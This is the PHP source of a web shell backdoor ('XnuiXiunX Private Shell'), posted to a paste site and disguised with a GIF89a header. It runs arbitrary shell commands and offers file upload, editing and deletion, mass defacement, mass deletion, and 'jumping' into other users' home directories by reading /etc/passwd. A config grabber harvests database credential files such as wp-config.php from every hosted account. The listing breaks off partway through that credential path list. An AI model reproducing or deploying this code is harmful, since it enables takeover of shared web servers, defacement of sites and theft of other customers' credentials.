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XnuiXiunX Private Shell

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Feb 23rd, 2020
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  1. <!DOCTYPE html>
  2. GIF89a;
  3. <?php
  4. /*
  5. [ Tak semua kami ngotak sendiri ]
  6. Special thanks for Holiq@Indosec
  7. Collabs team 22XploiterCrew ft Indosec Coder Team
  8. */
  10. error_reporting(0);
  11. set_time_limit(0);
  12. @clearstatcache();
  13. @ini_set('error_log',NULL);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @ini_set('output_buffering',0);
  17. @ini_set('display_errors', 0);
  19. function w($dir,$perm) {
  20. if(!is_writable($dir)) {
  21. return "<font color=red>".$perm."</font>";
  22. } else {
  23. return "<font color=lime>".$perm."</font>";
  24. }
  25. }
  26. function r($dir,$perm) {
  27. if(!is_readable($dir)) {
  28. return "<font color=red>".$perm."</font>";
  29. } else {
  30. return "<font color=lime>".$perm."</font>";
  31. }
  32. }
  34. function exe($cmd) {
  35. if(function_exists('system')) {
  36. @ob_start();
  37. @system($cmd);
  38. $buff = @ob_get_contents();
  39. @ob_end_clean();
  40. return $buff;
  41. } elseif(function_exists('exec')) {
  42. @exec($cmd,$results);
  43. $buff = "";
  44. foreach($results as $result) {
  45. $buff .= $result;
  46. } return $buff;
  47. } elseif(function_exists('passthru')) {
  48. @ob_start();
  49. @passthru($cmd);
  50. $buff = @ob_get_contents();
  51. @ob_end_clean();
  52. return $buff;
  53. } elseif(function_exists('shell_exec')) {
  54. $buff = @shell_exec($cmd);
  55. return $buff;
  56. }
  57. }
  59. function perms($file){
  60. $perms = fileperms($file);
  62. if (($perms & 0xC000) == 0xC000) {
  63. // Socket
  64. $info = 's';
  65. } elseif (($perms & 0xA000) == 0xA000) {
  66. // Symbolic Link
  67. $info = 'l';
  68. } elseif (($perms & 0x8000) == 0x8000) {
  69. // Regular
  70. $info = '-';
  71. } elseif (($perms & 0x6000) == 0x6000) {
  72. // Block special
  73. $info = 'b';
  74. } elseif (($perms & 0x4000) == 0x4000) {
  75. // Directory
  76. $info = 'd';
  77. } elseif (($perms & 0x2000) == 0x2000) {
  78. // Character special
  79. $info = 'c';
  80. } elseif (($perms & 0x1000) == 0x1000) {
  81. // FIFO pipe
  82. $info = 'p';
  83. } else {
  84. // Unknown
  85. $info = 'u';
  86. }
  88. // Owner
  89. $info .= (($perms & 0x0100) ? 'r' : '-');
  90. $info .= (($perms & 0x0080) ? 'w' : '-');
  91. $info .= (($perms & 0x0040) ?
  92. (($perms & 0x0800) ? 's' : 'x' ) :
  93. (($perms & 0x0800) ? 'S' : '-'));
  94. // Group
  95. $info .= (($perms & 0x0020) ? 'r' : '-');
  96. $info .= (($perms & 0x0010) ? 'w' : '-');
  97. $info .= (($perms & 0x0008) ?
  98. (($perms & 0x0400) ? 's' : 'x' ) :
  99. (($perms & 0x0400) ? 'S' : '-'));
  101. // World
  102. $info .= (($perms & 0x0004) ? 'r' : '-');
  103. $info .= (($perms & 0x0002) ? 'w' : '-');
  104. $info .= (($perms & 0x0001) ?
  105. (($perms & 0x0200) ? 't' : 'x' ) :
  106. (($perms & 0x0200) ? 'T' : '-'));
  108. return $info;
  109. }
  112. if(isset($_GET['path'])){
  113. $path = $_GET['path'];
  114. chdir($path);
  115. }else{
  116. $path = getcwd();
  117. }
  118. $path = str_replace('\\','/',$path);
  119. $paths = explode('/',$path);
  120. if(isset($_GET['dir'])) {
  121. $dir = $_GET['dir'];
  122. chdir($dir);
  123. } else {
  124. $dir = getcwd();
  125. }
  126. $kernel = php_uname();
  127. $ip = getHostByName(getHostName());
  128. $ver = phpversion();
  129. $dom = $_SERVER['HTTP_HOST'];
  130. $dir = str_replace("\\","/",$dir);
  131. $scdir = explode("/", $dir);
  132. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "On" : "Off";
  133. $ds = @ini_get("disable_functions");
  134. $mysql = (function_exists('mysql_connect')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  135. $curl = (function_exists('curl_version')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  136. $wget = (exe('wget --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  137. $perl = (exe('perl --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  138. $python = (exe('python --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  139. $show_ds = (!empty($ds)) ? "$ds" : "NONE";
  140. $total = formatSize(disk_total_space($path));
  141. $free = formatSize(disk_free_space($path));
  142. $total1 = disk_total_space($path);
  143. $free1 = disk_free_space($path);
  144. $used = formatSize($total1 - $free1);
  145. function formatSize( $bytes ) {
  146. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
  147. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
  148. return( round( $bytes, 2 ) . " " . $types[$i] );
  149. }
  151. function ambilKata($param, $kata1, $kata2){
  152. if(strpos($param, $kata1) === FALSE) return FALSE;
  153. if(strpos($param, $kata2) === FALSE) return FALSE;
  154. $start = strpos($param, $kata1) + strlen($kata1);
  155. $end = strpos($param, $kata2, $start);
  156. $return = substr($param, $start, $end - $start);
  157. return $return;
  158. }
  160. echo "
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  166. <meta name='author' content='XnuiXiunX'/>
  167. <meta name='copyright' content='Indonesian Error System'/>
  168. <meta name='description' content='Imutz Shell Backdoor'>
  169. <meta name='theme-color' content='#000'>
  170. <link rel='stylesheet' href=''>
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  287. <nav class='navbar static-top navbar-dark'>
  288. <button class='navbar-toggler'type='button' data-toggle='collapse' data-target='#info'>
  289. <i style='color:#fff;' class='fa fa-user'></i>
  290. </button>
  291. <div class='collapse navbar-collapse' id='info'>
  292. <div class='table-responsive-lg'>
  293. <ul>
  294. <a href='?' class='fiture btn btn-primary btn-sm btn-block mb-2'><i class='fa fa-home'></i> Home</a>
  295. <div class='row'>
  296. <div class='col'>
  297. <a href='?dir=$dir&aksi=upload' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-upload'></i> Upload</a>
  298. </div>
  299. <div class='col'>
  300. <a href='?dir=$dir&aksi=buat_file' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus-circle'></i> Buat File</a>
  301. </div>
  302. <div class='col'>
  303. <a href='?dir=$dir&aksi=buat_folder' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus'></i> Buat Folder</a>
  304. </div>
  305. </div>
  306. <div class='row'>
  307. <div class='col'>
  308. <a href='?dir=$dir&aksi=MassDeface' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Mass Deface</a>
  309. </div>
  310. <div class='col'>
  311. <a href='?dir=$dir&aksi=MassDellete' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-trash'></i> Mass Delete</a>
  312. </div>
  313. <div class='col'>
  314. <a href='?dir=$dir&aksi=jumping' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Jumping</a>
  315. </div>
  316. </div>
  317. <div class='row'>
  318. <div class='col'>
  319. <a href='?dir=$dir&aksi=config' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-cogs'></i> Config</a>
  320. </div>
  321. <div class='col'>
  322. <a href='?dir=$dir&aksi=adminer' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-user'></i> Adminer</a>
  323. </div>
  324. <div class='col'>
  325. <a href='?dir=$dir&aksi=symlink' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-circle'></i> Symlink</a>
  326. </div>
  327. </div>
  328. <div class='row'>
  329. <div class='col'>
  330. <a href='?dir=$dir&aksi=CpanelReset' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-key'></i> Auto Reset Cpanel</a>
  331. </div>
  332. <div class='col'>
  333. <a href='?keluar' class='fiture btn btn-warning btn-sm btn-block'><i class='fa fa-sign-out'></i> keluar</a>
  334. </div>
  335. </div>
  336. <a href='?dir=$dir&aksi=InfoServer' class='fiture btn btn-info btn-sm btn-block mt-2'>Info Server</a>
  337. </ul>
  338. </div>
  339. </div>
  340. </nav>
  341. <div class=''>
  342. <h1 class='text-center'><a href=''>[ > ] XnuiXiunX Private Shell [ < ]</h1>
  343. <center><p>Silent But Deadly and This Exploit will Shut You Down!!</a></p></center>
  344. <hr/>";
  345. //keluar
  346. if (isset($_GET['keluar'])) {
  347. session_start();
  348. session_destroy();
  349. echo '<script>window.location="?";</script>';
  350. }
  352. // Info Server
  353. if($_GET['aksi'] == 'InfoServer'){
  354. echo '
  355. <div class="alert alert-info mt-3">
  356. <h3 class="text-center">Informasi Server</h3><hr>
  357. <li>Nama Server : '.$_SERVER["SERVER_NAME"].'</li>
  358. <li>Ip Address : '.$_SERVER["SERVER_ADDR"].'</li>
  359. <li>Port : '.$_SERVER["SERVER_PORT"].'</li>
  360. <li>HDD : '.$used.' / '.$total.'</font> ( Free: '.$free.' )</li>
  361. <li>Protokol : '.$_SERVER["SERVER_PROTOCOL"].'</li>
  362. <li>Save Data : '.$_SERVER["HTTP_SAVE_DATA"].'</li>
  363. <li>Save Mode : '.$sm.'</li>
  364. <li>Fungsi Nonaktif : '.$show_ds.'</li>
  365. <li>Koneksi : '.$_SERVER["HTTP_CONNECTION"].'</li>
  366. <li>Software : '.$_SERVER["SERVER_SOFTWARE"].'</li>
  367. <li>Dokumen Root : '.$_SERVER["DOCUMENT_ROOT"].'</li>
  368. <li>G-Interface : '.$_SERVER["GATEWAY_INTERFACE"].'</li>
  369. <li>R-Method : '.$_SERVER["REQUEST_METHOD"].'</li>
  370. <li>Mysql : '.$mysql.'</li>
  371. <li>Perl : '.$perl.'</li>
  372. <li>Wget : '.$wget.'</li>
  373. <li>Curl : '.$curl.'</li>
  374. <li>Sistem Server : '.$kernel.'</li>
  375. <hr>
  376. <li>Your IP: '.$_SERVER["REMOTE_ADDR"].'</li>
  377. <li>Your Browser : '.$_SERVER["HTTP_USER_AGENT"].'</li>
  378. </div>';
  379. }
  381. //upload
  382. if ($_GET['aksi'] == 'upload') {
  383. echo
  384. "<form method='post' enctype='multipart/form-data' name='uploader' id='uploader'>
  385. <div class='form-group'>
  386. <label>Upload File: </label><br>
  387. <input class='' type='file' name='file'>
  388. </div>
  389. <div class='form-group'>
  390. <input class='btn btn-primary btn-sm' type='submit' value='Upload'>
  391. </div>
  392. </form>";
  394. if(isset($_FILES['file'])){
  395. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$_FILES['file']['name'])){
  396. echo '<script>window.location="?dir='.$dir.'"; alert("Upload Berhasil");</script>';
  397. }else{
  398. echo '<script>alert("Gagal Upload!!!");</script>';
  399. }
  400. }
  401. }
  403. //openfile
  404. if (isset($_GET['dirf'])) {
  405. $file = $_GET['dirf'];
  406. }
  408. //buat_file
  409. if ($_GET['aksi'] == 'buat_file') {
  411. $output = "
  412. <form method='post'>
  413. <input type='text' class='form-control mb-3' name='nama_file' placeholder='Nama File'>
  414. <textarea name='isi_file' class='form-control mb-3' rows='8' placeholder='Isi File'></textarea>
  415. <button type='sumbit' class='btn btn-outline-primary btn-block' name='bikin'>Buat</button><br/>
  416. </form>";
  417. echo $output;
  419. if (isset($_POST['bikin'])) {
  420. $nama_file = $_POST['nama_file'];
  421. $isi_file = $_POST['isi_file'];
  422. $handle = fopen("$nama_file", "w");
  424. if (fwrite($handle, $isi_file)) {
  425. echo '<script>window.location="?dir='.$dir.'"; alert("Buat File Berhasil");</script>';
  426. }else{
  427. echo '<script>("File Gagal Dibuat");</script>';
  428. }
  429. }
  430. }
  432. /*
  433. View
  434. */
  435. if($_GET['aksi'] == 'view') {
  436. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
  437. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
  438. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center>';
  439. echo "
  440. <textarea rows='16' class='form-control mt-3' disabled=''>".htmlspecialchars(file_get_contents($file))."</textarea>
  441. <br/><br/>";
  442. }
  444. /*
  445. Edit
  446. */
  447. if($_GET['aksi'] == 'edit') {
  448. $nama = basename($file);
  449. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]
  450. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center><hr>';
  451. echo "<form method='post' class='mt-3'>
  452. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
  453. <textarea rows='16' class='form-control mb-3' name='isi'>".htmlspecialchars(file_get_contents($file))."</textarea>
  454. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Ubah</button>
  455. </form><br/>";
  457. if(isset($_POST['edit_file'])) {
  458. $updt = fopen("$file", "w");
  459. $hasil = fwrite($updt, $_POST['isi']);
  461. if ($hasil) {
  462. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Mengubah Isi File");</script>';
  463. }else{
  464. echo '<script>alert("Gagal Mengubah Isi File");</script>';
  465. }
  466. }
  467. }
  469. /*
  470. Ubah Nama
  471. */
  472. if($_GET['aksi'] == 'rename') {
  473. $nama = basename($file);
  474. echo '<center>[ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Kembali</a> ]</center>';
  475. echo "<form method='post' class='mt-3'>
  476. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
  477. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
  478. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Update</button><br/>
  479. </form><br/>";
  481. if(isset($_POST['rename_file'])) {
  482. $lama = $file;
  483. $baru = $_POST['namanew'];
  484. rename( $baru, $lama);
  485. if(file_exists($baru)) {
  486. echo '<script>alert("Nama '.$baru.' Telah Digunakan");</script>';
  487. }else{
  488. if(rename( $lama, $baru)) {
  489. echo '<script>window.location="?dir='.$dir.'"; alert("Sukses Mengganti Nama Menjadi '.$baru.'");</script>';
  490. }else{
  491. echo '<script>alert("Gagal Mengganti Nama");</script>';
  492. }
  493. }
  494. }
  495. }
  497. /*
  498. Delete File
  499. */
  500. if ($_GET['aksi'] == 'hapusf') {
  501. $nama = basename($file);
  502. echo '<center>
  503. [ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
  504. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
  505. [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]</center>';
  506. $output ="
  507. <div class=''>
  508. <center><br/>
  509. <font color='white'>Yakin Ingin Menghapus File : $nama
  510. </center><br/><br/>
  511. <form method='post'>
  512. <div class='row'>
  513. <div class='col'>
  514. <input type='submit' name='ya' class='float-right btn btn-success btn-success btn-block' value='Ya'>
  515. </div>
  516. <div class='col'>
  517. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
  518. </div>
  519. </div>
  520. </form>
  521. </div><br/>";
  522. echo $output;
  524. if ($_POST['ya']) {
  525. $hapus = unlink($file);
  526. if ($hapus) {
  527. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Menghapus File");</script>';
  528. }else{
  529. echo '<script>alert("Gagal Menghapus File!");</script>';
  530. }
  531. }
  532. }
  534. /*
  535. Add Folder
  536. */
  537. if ($_GET['aksi'] == 'buat_folder' ) {
  538. $output = "
  539. <form method='post'>
  540. <input type='text' class='form-control mb-4' name='nama_folder' placeholder='Nama Folder'>
  541. <button type='sumbit' class='btn btn-outline-primary btn-block' name='buat'>Buat</button><br/>
  542. </form>";
  543. echo $output;
  545. if (isset($_POST['buat'])) {
  546. $nama_folder = $_POST['nama_folder'];
  547. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]);
  548. $fd = mkdir ($folder);
  549. if ($fd) {
  550. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Membuat Folder");</script>';
  551. }else{
  552. echo "echo '<script> alert('Folder ".$folder." Gagal Dibuat');</script>";
  553. }
  554. }
  555. }
  557. /*
  558. Delete Folder
  559. */
  560. if ($_GET['aksi'] == 'hapus_folder' ) {
  561. $nama = basename(getcwd());
  562. $output ="
  563. <center>[ <a href='?dir=".$dir."&aksi=rename_folder'>Ubah Nama</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]</center>
  564. <div class='container'>
  565. <center><br/>
  566. <font color='white'>Yakin Ingin Menghapus Folder : $nama ?
  567. </center><br/><br/>
  568. <form method='post'>
  569. <div class='row'>
  570. <div class='col'>
  571. <input type='submit' name='ya' class='float-right btn btn-success btn-block' value='Iya'>
  572. </div>
  573. <div class='col'>
  574. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
  575. </div>
  576. </div>
  577. </form>
  578. </div><br/>";
  579. echo $output;
  581. if ($_POST['ya']) {
  582. if(is_dir($dir)) {
  583. if(is_writable($dir)) {
  584. @rmdir($dir);
  585. @exe("rm -rf $dir");
  586. @exe("rmdir /s /q $dir");
  587. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Menghapus Folder');</script>";
  588. } else {
  589. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Tidak Dapat Menghapus Folder');</script>";
  590. }
  591. }
  592. }
  593. exit;
  594. }
  596. /*
  597. Ubah Nama Folder
  598. */
  599. if ($_GET['aksi'] == 'rename_folder' ) {
  600. $nama = basename(getcwd());
  601. $output="
  602. <center>
  603. [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]<hr></center><p class='ml-2'>Nama Folder => $nama</p>
  604. <form method='post'>
  605. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
  606. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
  607. </form>";
  608. echo $output;
  610. if (isset($_POST['ganti'])) {
  611. $lama = $dir;
  612. $baru = $_POST['namanew'];
  613. $ubah = rename($lama, $baru);
  614. if($ubah) {
  615. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Mengganti Nama');</script>";
  616. }else{
  617. echo "<script>alert('Gagal Mengganti Nama');</script>" ;
  618. }
  619. }
  620. exit;
  621. }
  623. /*
  624. mass delete
  625. */
  626. if($_GET['aksi'] == 'MassDellete') {
  628. function hapus_massal($dir,$namafile) {
  629. if(is_writable($dir)) {
  630. $dira = scandir($dir);
  631. foreach($dira as $dirb) {
  632. $dirc = "$dir/$dirb";
  633. $lokasi = $dirc.'/'.$namafile;
  634. if($dirb === '.') {
  635. if(file_exists("$dir/$namafile")) {
  636. unlink("$dir/$namafile");
  637. }
  638. } elseif($dirb === '..') {
  639. if(file_exists("".dirname($dir)."/$namafile")) {
  640. unlink("".dirname($dir)."/$namafile");
  641. }
  642. } else {
  643. if(is_dir($dirc)) {
  644. if(is_writable($dirc)) {
  645. if($lokasi) {
  646. echo "$lokasi > Terhapus\n";
  647. unlink($lokasi);
  648. $massdel = hapus_massal($dirc,$namafile);
  649. }
  650. }
  651. }
  652. }
  653. }
  654. }
  655. }
  657. if($_POST['start']) {
  658. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
  659. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  660. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
  661. } else {
  662. echo "<form method='post'>
  663. <p><i class='fa fa-folder'></i> Lokasi</p>
  664. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  665. <p><i class ='fa fa-file'></i> Nama File</p>
  666. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br>
  667. <input type='submit' name='start' value='Hapus' class='btn btn-danger form-control'>
  668. </form>";
  669. }
  670. exit;
  671. }
  675. /*
  676. Mass Deface
  677. */
  678. if($_GET['aksi'] == 'MassDeface') {
  680. function tipe_massal($dir,$namafile,$isi_script) {
  681. if(is_writable($dir)) {
  682. $dira = scandir($dir);
  683. foreach($dira as $dirb) {
  684. $dirc = "$dir/$dirb";
  685. $lokasi = $dirc.'/'.$namafile;
  686. if($dirb === '.') {
  687. file_put_contents($lokasi, $isi_script);
  688. } elseif($dirb === '..') {
  689. file_put_contents($lokasi, $isi_script);
  690. } else {
  691. if(is_dir($dirc)) {
  692. if(is_writable($dirc)) {
  693. echo "Berhasil => $lokasi\n";
  694. file_put_contents($lokasi, $isi_script);
  695. $MassDeface = tipe_massal($dirc,$namafile,$isi_script);
  696. }
  697. }
  698. }
  699. }
  700. }
  701. }
  703. function tipe_biasa($dir,$namafile,$isi_script) {
  704. if(is_writable($dir)) {
  705. $dira = scandir($dir);
  706. foreach($dira as $dirb) {
  707. $dirc = "$dir/$dirb";
  708. $lokasi = $dirc.'/'.$namafile;
  709. if($dirb === '.') {
  710. file_put_contents($lokasi, $isi_script);
  711. } elseif($dirb === '..') {
  712. file_put_contents($lokasi, $isi_script);
  713. } else {
  714. if(is_dir($dirc)) {
  715. if(is_writable($dirc)) {
  716. echo "Berhasil => $dirb/$namafile\n";
  717. file_put_contents($lokasi, $isi_script);
  718. }
  719. }
  720. }
  721. }
  722. }
  723. }
  725. if($_POST['start']) {
  727. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
  728. if($_POST['tipe'] == 'mahal') {
  729. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  730. } elseif($_POST['tipe'] == 'murah') {
  731. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  732. }
  733. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
  734. } else {
  735. echo "<form method='post'>
  736. <center>
  737. <p>{ Type Mass Deface }</p>
  738. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
  739. <label for='toggle-on' class='butn'>Biasa</label>
  740. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
  741. <label for='toggle-off' class='butn'>Masal</label>
  742. </center><hr>
  743. <p><i class='fa fa-folder'></i> Lokasi</p>
  744. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  745. <p><i class ='fa fa-file'></i> Nama File</p>
  746. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br/>
  747. <p><i class ='fa fa-file'></i> Isi File</p>
  748. <textarea name='script' class='form-control' rows='5' placeholder='Hacked By 22XploiterCrew'></textarea><br/>
  749. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
  750. </form>";
  751. }
  752. exit;
  753. }
  757. /*
  758. Jumping
  759. */
  760. if($_GET['aksi'] == 'jumping') {
  761. $i = 0;
  762. echo "<div class='card container'>";
  763. if(preg_match("/hsphere/", $dir)) {
  764. $urls = explode("\r\n", $_POST['url']);
  765. if(isset($_POST['jump'])) {
  766. echo "<pre>";
  767. foreach($urls as $url) {
  768. $url = str_replace(array("http://","www."), "", strtolower($url));
  769. $etc = "/etc/passwd";
  770. $f = fopen($etc,"r");
  771. while($gets = fgets($f)) {
  772. $pecah = explode(":", $gets);
  773. $user = $pecah[0];
  774. $dir_user = "/hsphere/local/home/$user";
  775. if(is_dir($dir_user) === true) {
  776. $url_user = $dir_user."/".$url;
  777. if(is_readable($url_user)) {
  778. $i++;
  779. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  780. if(is_writable($url_user)) {
  781. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  782. }
  783. echo $jrw."<br>";
  784. }
  785. }
  786. }
  787. }
  788. if($i == 0) {
  789. } else {
  790. echo "<br>Total ada ".$i." di ".$ip;
  791. }
  792. echo "</pre>";
  793. } else {
  794. echo '<center>
  795. <form method="post">
  796. List Domains: <br>
  797. <textarea name="url" class="form-control">';
  798. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  799. while($getss = fgets($fp)) {
  800. echo $getss;
  801. }
  802. echo '</textarea><br>
  803. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  804. </form></center>';
  805. }
  806. } elseif(preg_match("/vhosts/", $dir)) {
  807. $urls = explode("\r\n", $_POST['url']);
  808. if(isset($_POST['jump'])) {
  809. echo "<pre>";
  810. foreach($urls as $url) {
  811. $web_vh = "/var/www/vhosts/$url/httpdocs";
  812. if(is_dir($web_vh) === true) {
  813. if(is_readable($web_vh)) {
  814. $i++;
  815. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  816. if(is_writable($web_vh)) {
  817. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  818. }
  819. echo $jrw."<br>";
  820. }
  821. }
  822. }
  823. if($i == 0) {
  824. } else {
  825. echo "<br>Total ada ".$i." Kamar di ".$ip;
  826. }
  827. echo "</pre>";
  828. } else {
  829. echo '<center>
  830. <form method="post">
  831. List Domains: <br>
  832. <textarea name="url" class="form-control">';
  833. bing("ip:$ip");
  834. echo '</textarea><br>
  835. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  837. </form></center>';
  838. }
  839. } else {
  840. echo "<pre>";
  841. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
  842. while($passwd = fgets($etc)) {
  843. if($passwd == '' || !$etc) {
  844. echo "<font color=red>Can't read /etc/passwd</font><br/>";
  845. } else {
  846. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  847. foreach($user_jumping[1] as $user_pro_jump) {
  848. $user_jumping_dir = "/home/$user_pro_jump/public_html";
  849. if(is_readable($user_jumping_dir)) {
  850. $i++;
  851. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  852. if(is_writable($user_jumping_dir)) {
  853. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  854. }
  855. echo $jrw;
  856. if(function_exists('posix_getpwuid')) {
  857. $domain_jump = file_get_contents("/etc/named.conf");
  858. if($domain_jump == '') {
  859. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  860. } else {
  861. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  862. foreach($domains_jump[1] as $dj) {
  863. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  864. $user_jumping_url = $user_jumping_url['name'];
  865. if($user_jumping_url == $user_pro_jump) {
  866. echo " => ( <u>$dj</u> )<br>";
  867. break;
  868. }
  869. }
  870. }
  871. } else {
  872. echo "<br>";
  873. }
  874. }
  875. }
  876. }
  877. }
  878. if($i == 0) {
  879. } else {
  880. echo "<br>Total ada ".$i." Kamar di ".$ip;
  881. }
  882. echo "</pre>";
  883. }
  884. echo "</div>";
  885. }
  887. /*
  888. Config
  889. */
  890. if($_GET['aksi'] == 'config') {
  891. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  892. $con = mkdir("codexploit_configs", 0777);
  893. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  894. $htc = fopen("codexploit_configs/.htaccess","w");
  895. fwrite($htc, $isi_htc);
  896. while($passwd = fgets($etc)) {
  897. if($passwd == "" || !$etc) {
  898. echo "<font color=red>Can't read /etc/passwd</font>";
  899. } else {
  900. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  901. foreach($user_config[1] as $user_con) {
  902. $user_config_dir = "/home/$user_con/public_html/";
  903. if(is_readable($user_config_dir)) {
  904. $grab_config =
  905. [
  906. "/home/$user_con/.my.cnf" => "cpanel",
  907. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
  908. "/home/$user_con/public_html/forum/config.php" => "phpBB",
  909. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
  910. "/home/$user_con/public_html/config/" => "PrestaShop",
  911. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
  912. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
  913. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
  914. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
  915. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
  916. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
  917. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
  918. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
  919. "/home/$user_con/public_html/inc/config.php" => "MyBB",
  920. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
  921. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
  922. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
  923. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
  924. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
  925. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
  926. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
  927. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
  928. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
  929. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
  930. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
  931. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
  932. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
  933. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
  934. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
  935. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
